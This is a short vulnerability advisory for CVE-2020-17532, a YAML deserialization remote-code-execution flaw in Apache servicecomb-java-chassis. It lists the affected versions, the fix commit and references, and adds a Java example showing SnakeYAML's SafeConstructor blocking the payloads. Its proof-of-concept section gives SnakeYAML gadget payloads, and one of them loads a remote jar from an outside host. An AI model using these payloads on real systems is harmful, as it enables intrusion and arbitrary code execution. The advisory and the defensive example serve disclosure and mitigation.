
CVE-2020-17532 Apache servicecomb-java-chassis YAML Deserialization Vulnerability

When the handler-router component is enabled in servicecomb-java-chassis, an authenticated user may inject data and cause arbitrary code execution.

commit:

https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c

Affected versions: < 2.1.5

PoC:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]
!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]
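
A defensive counterpart to the payloads above, as an added example that is not from the original page or the ServiceComb code base: it assumes the YAML is parsed with SnakeYAML (whose `!!class` global-tag syntax the payloads use) and shows `SafeConstructor` refusing such tags. `SafeRuleLoader`, its methods and the benign rule text are hypothetical and constructed for illustration.

```java
import java.util.List;
import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Hypothetical helper (not a ServiceComb API): parses user-influenced YAML
// so that only standard YAML types (maps, lists, scalars) can be built.
public class SafeRuleLoader {

    // On SnakeYAML 1.x, `new Yaml()` uses the default Constructor, which maps
    // a `!!fully.qualified.Class` tag to that Java class and calls its
    // constructor. SafeConstructor has no mapping for such tags and throws.
    // The SafeConstructor(LoaderOptions) form is assumed to be available in
    // the SnakeYAML version on the classpath.
    static Object loadRules(String text) {
        Yaml yaml = new Yaml(new SafeConstructor(new LoaderOptions()));
        return yaml.load(text);
    }

    // Accept a document only if it parses safely and has the expected
    // top-level shape (a list of rules in this constructed example).
    static boolean isAccepted(String text) {
        try {
            return loadRules(text) instanceof List;
        } catch (YAMLException e) {
            // Includes the ConstructorException raised for unknown tags.
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample input, not a real ServiceComb rule file.
        String benign = "- precedence: 2\n"
                      + "  match:\n"
                      + "    headers:\n"
                      + "      region: east\n";
        // First payload line from this page (loopback URL). With
        // SafeConstructor no class is instantiated and no URL is fetched.
        String tagged = "!!javax.script.ScriptEngineManager "
                      + "[!!java.net.URLClassLoader "
                      + "[[!!java.net.URL [\"http://127.0.0.1/\"]]]]";

        System.out.println("benign accepted: " + isAccepted(benign));
        System.out.println("tagged accepted: " + isAccepted(tagged));
    }
}
```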

ref:

  • https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
  • https://seclists.org/oss-sec/2021/q1/60
  • https://forum.ywhack.com/thread-115020-1-1.html